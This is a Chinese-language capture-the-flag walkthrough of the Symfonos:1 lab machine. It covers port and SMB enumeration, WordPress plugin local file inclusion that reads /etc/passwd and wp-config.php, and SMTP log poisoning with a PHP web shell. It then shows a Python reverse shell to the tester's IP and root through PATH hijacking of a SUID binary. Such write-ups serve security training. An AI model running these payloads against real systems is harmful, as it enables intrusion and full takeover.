本文內(nèi)容純屬虛構(gòu)，B站攻略鴨求關(guān)注點贊支持！

將靶機(jī)網(wǎng)絡(luò)連接設(shè)置成為NAT。

靶機(jī)地址：192.168.31.145

測試機(jī)IP地址：192.168.31.37

外部信息收集

訪問http://192.168.31.145/只顯示了一個圖片。

目錄結(jié)構(gòu)

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.145/FUZZ
http://192.168.31.145/manual/
http://192.168.31.145/image.jpg
http://192.168.31.145/index.html

端口掃描

PORT ? ?STATE SERVICE ? ? REASON ? ? ? ? VERSION
22/tcp ?open ?ssh ? ? ? ? syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
25/tcp ?open ?smtp ? ? ? ?syn-ack ttl 64 Postfix smtpd
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Issuer: commonName=symfonos
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
80/tcp ?open ?http ? ? ? ?syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
| http-methods:
|_ ?Supported Methods: POST OPTIONS HEAD GET
|_http-title: Site doesn't have a title (text/html).
139/tcp open ?netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X
445/tcp open ?netbios-ssn syn-ack ttl 64 Samba smbd 4.5.16-Debian

137/udp open ?netbios-ns udp-response ttl 64 Samba nmbd netbios-ns

SMB空口令登錄

$ ?smbclient -L 192.168.31.145
Sharename ? ? ? Type ? ? ?Comment
--------- ? ? ? ---- ? ? ?-------
print$ ? ? ? ? ?Disk ? ? ?Printer Drivers
helios ? ? ? ? ?Disk ? ? ?Helios personal share
anonymous ? ? ? Disk ? ? ?
IPC$ ? ? ? ? ? ?IPC ? ? ? IPC Service (Samba 4.5.16-Debian)

smbclient "\\\\192.168.31.145\IPC$"
smb: \> ls

smbclient "\\\\192.168.31.145\anonymous"
smb: \> ls
attention.txt
smb: \> get attention.txt

smbclient "\\\\192.168.31.145\helios"
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED

smbclient "\\\\192.168.31.145\print$"
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED

也可以不用smbclient，直接kali文件夾訪問smb://192.168.31.145/

查看attention.txt內(nèi)容

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'!
Next person I find using one of these passwords will be fired!
-Zeus

嘗試使用泄露的SMB口令訪問

smbclient "\\\\192.168.31.145\helios" -U helios%qwerty
smb: \> ls
research.txt ? ? ? ? ? ? ? ? ? ? ? ?A ? ? ?432 ?Fri Jun 28 20:32:05 2019
todo.txt ? ? ? ? ? ? ? ? ? ? ? ? ? ?A ? ? ? 52 ?Fri Jun 28 20:32:05 2019
smb: \> get research.txt
smb: \> get todo.txt

查看research.txt內(nèi)容

Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.

未發(fā)現(xiàn)可用內(nèi)容

查看todo.txt內(nèi)容

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

發(fā)現(xiàn)/h3l105目錄

WordPress

訪問http://192.168.31.145/h3l105/發(fā)現(xiàn)一個WordPress頁面

sudo wpscan --url http://192.168.31.145/h3l105/ --enumerate vt,vp,u
WordPress version 5.2.2 identified (Insecure, released on 2019-06-18)
用戶名admin
http://192.168.31.145/h3l105/wp-content/uploads/

對該頁面使用BurpSuite抓包看到向服務(wù)器發(fā)請求時會請求域名symfonos.local

修改/etc/hosts：

192.168.31.145 symfonos.local

$ sudo wpscan --url http://symfonos.local/h3l105/ Plugin(s) [+] mail-masta ?| Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/ ?| Latest Version: 1.0 (up to date) ?| Last Updated: 2014-09-19T07:52:00.000Z [+] site-editor ?| Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/ ?| Latest Version: 1.1.1 (up to date) ?| Last Updated: 2017-05-02T23:34:00.000Z

搜索很驗證WordPress插件漏洞

searchsploit wordpress mail masta ------ ?Exploit Title ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? | ?Path ------ WordPress Plugin Mail Masta 1.0 - Local File Inclusion ? ? ? ? ? ? ? ? ? ? ? | php/webapps/40290.txt WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2) ? ? ? ? ? ? ? ? ? | php/webapps/50226.py WordPress Plugin Mail Masta 1.0 - SQL Injection ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?| php/webapps/41438.txt searchsploit wordpress site editor $ searchsploit wordpress site editor ------ ?Exploit Title ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? | ?Path ------ WordPress Plugin Site Editor 1.1.1 - Local File Inclusion ? ? ? ? ? ? ? ? ? ?| php/webapps/44340.txt WordPress Plugin User Role Editor 3.12 - Cross-Site Request Forgery ? ? ? ? ?| php/webapps/25721.txt searchsploit -m 40290.txt PoC http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd 存在LFI searchsploit -m 50226.py python2 50226.py ~# http://symfonos.local/h3l105 [*] Checking if the Mail-Masta endpoint is vulnerable... [!] Endpoint vulnerable! searchsploit -m 41438.txt http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/lists/csvexport.php sqlmap -u "http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0*&pl=/var/www/html/wordpress/wp-load.php" --batch 驗證失敗 searchsploit -m 44340.txt PoC：http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd 存在LFI 結(jié)果 root:x:0:0:root:/root:/bin/bash lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin ... irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin sshd:x:107:65534::/run/sshd:/usr/sbin/nologin helios:x:1000:1000:,,,:/home/helios:/bin/bash mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false postfix:x:109:115::/var/spool/postfix:/bin/false

利用LFI漏洞

嘗試：

http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=php://filter/convert.base64-encode/resource=../../../../../wp-config.php

失敗，經(jīng)過搭環(huán)境測試，猜想是once的原因，更換exp：

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php

得到：

'DB_NAME', 'wordpress' 'DB_USER', 'wordpress' ?'DB_PASSWORD', 'password123' 'DB_HOST', 'localhost'

利用該密碼嘗試連接SSH失敗。

SMTP日志投毒使LFI實現(xiàn)RCE

利用LFI嘗試讀取Apache日志：http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/log/apache2/access.log

利用LFI嘗試讀取SMTP日志：http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios

發(fā)現(xiàn)可以讀取SMTP日志。

$ nc 192.168.31.145 25 220 symfonos.localdomain ESMTP Postfix (Debian/GNU) MAIL FROM:asdf 250 2.1.0 Ok RCPT TO:helios 250 2.1.5 Ok data 354 End data with <CR><LF>.<CR><LF> <?php system($_GET["cmd"]);?> . 250 2.0.0 Ok: queued as 9ABDC4084A QUIT 221 2.0.0 Bye http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&cmd=id uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

getshell

nc -nvlp 443 http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.37",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' python -c 'import pty;pty.spawn("/bin/bash")'

權(quán)限提升

本地信息收集

find / -perm -u=s -type f 2>/dev/null /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/bin/passwd /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /opt/statuscheck /bin/mount /bin/umount /bin/su /bin/ping

statuscheck

cat /opt/statuscheck 看不出內(nèi)容 file /opt/statuscheck /opt/statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped strings /opt/statuscheck /lib64/ld-linux-x86-64.so.2 libc.so.6 system __cxa_finalize __libc_start_main _ITM_deregisterTMCloneTable __gmon_start__ _Jv_RegisterClasses _ITM_registerTMCloneTable GLIBC_2.2.5 curl -I H http://lH ocalhostH

劫持環(huán)境變量提權(quán)

cd /tmp
echo "int main(void) {" > curl.c
echo -e "\tsetgid(0); setuid(0);" >> curl.c
echo -e "\texecl(\"/bin/sh\",\"sh\",0);" >> curl.c
echo "}" >> curl.c

cat curl.c
int main(void) {
? ? ? ?setgid(0); setuid(0);
? ? ? ?execl("/bin/sh","sh",0);
}

helios@symfonos:/tmp$ gcc curl.c -o curl
gcc curl.c -o curl
curl.c: In function 'main':
curl.c:2:2: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]
?setgid(0); setuid(0);
?^~~~~~
curl.c:2:13: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
?setgid(0); setuid(0);
? ? ? ? ? ? ^~~~~~
curl.c:3:2: warning: implicit declaration of function 'execl' [-Wimplicit-function-declaration]
?execl("/bin/sh","sh",0);
?^~~~~
curl.c:3:2: warning: incompatible implicit declaration of built-in function 'execl'

env
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export PATH=/tmp:$PATH
env
PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

/opt/statuscheck
id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(helios)

其他

flag

cat /root/proof.txt
Congrats on rooting symfonos:1!